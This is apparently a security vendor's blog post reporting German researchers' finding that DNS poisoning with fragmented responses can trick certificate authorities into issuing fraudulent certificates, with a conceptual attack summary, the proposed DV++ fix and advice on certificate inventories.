Until this week, the spoofing websites used in phishing attacks usually had a tell. Whether they used a numeral instead of a character, a similar-but-not-identical spelling or a character from another alphabet, there was always something that would give them away. Even if it was visible only to machines and not the naked eye, there was a small difference that would distinguish a spoofed website from the genuine article.
But now, attackers may have access to new techniques that would cloud those distinctions. German researchers have discovered a way to circumvent domain validation to gain access to fraudulent certificates for legitimate websites. The attack uses DNS poisoning to trick certificate authorities (CAs) into issuing fraudulent certificates and has apparently been “validated” at more than one (un-named) CA.
The details of the vulnerability are a bit cat and mouse right now. The reason that we know about it at all is that the The Register has apparently seen an early copy of a report by German researchers. While the researchers plan to present the results in October at the ACM Conference on Computer and Communications Security in Toronto, the report itself is still not public.
But the implications of this vulnerability could be quite serious. This type of attack would make it significantly easier for hackers to set up legitimate-seeming spoofed sites. And those websites would look real because they would actually be using a certificate tied to the domain they were spoofing.
Here’s where it gets tricky. Inherently, there is nothing wrong with cyber criminals encrypting their own sites. They simply request legitimate certificates to secure sites that they legitimately own. On the other hand, the way they use those sites is often anything but legitimate. But if attackers can trick CAs into issuing fraudulent certificates for legitimate domains, then that’s a game changer.
Justin Hansen, security architect at Venafi warns that, “The impact of this attack can be quite serious. If an attacker can successfully poison DNS for any domains owned by a targeted organization, they will be able to get a certificate for that organization, and everyone on the internet will trust it. The attacker can then do a whole range of malicious things with that domain.”
The SSL Store blog provides an excellent summary of how such an attack could play out:
“The attack is initiated by a DNS request. The attacker must then craft a correct DNS response before the actual response from the real name-server gets there. The technique actually ensures that the DNS domain validation checks the CA is attempting are performed, but using the attacker’s DNS server instead of the one associated with the targeted domain.”
According to the unpublished report: “The attack depends on getting said DNS responses broken into fragments, and then injecting malicious fragments to fool the CA into handing over the cert to the attacker. The first fragments of the response contain valid DNS challenge-response fields. The inserted fragments can be whatever the miscreant needs to complete the transaction so that he or she gets the cert.”
What can the industry do to prevent exposure to misuse of domain validation? Researchers suggest a new domain validation protocol to address the problem. Dubbed DV++, the new protocol would use a distributed model (much like the one used in blockchain) to send requests to multiple certification agents.
“To pass a DV++ validation, domain owners must prove their ownership to a majority of the agents in a fully automated manner by responding to queries sent by the agents for the resource records in the domain.”
Until we know more about this vulnerability and how to prevent its exploit, it’s important that organizations maintain overall visibility of all the certificates that are being used for every domain and subdomain they own. A certificate reputation service would also help them know if any are being used for nefarious purposes.
Do you have a complete inventory of all the certificates in your organization?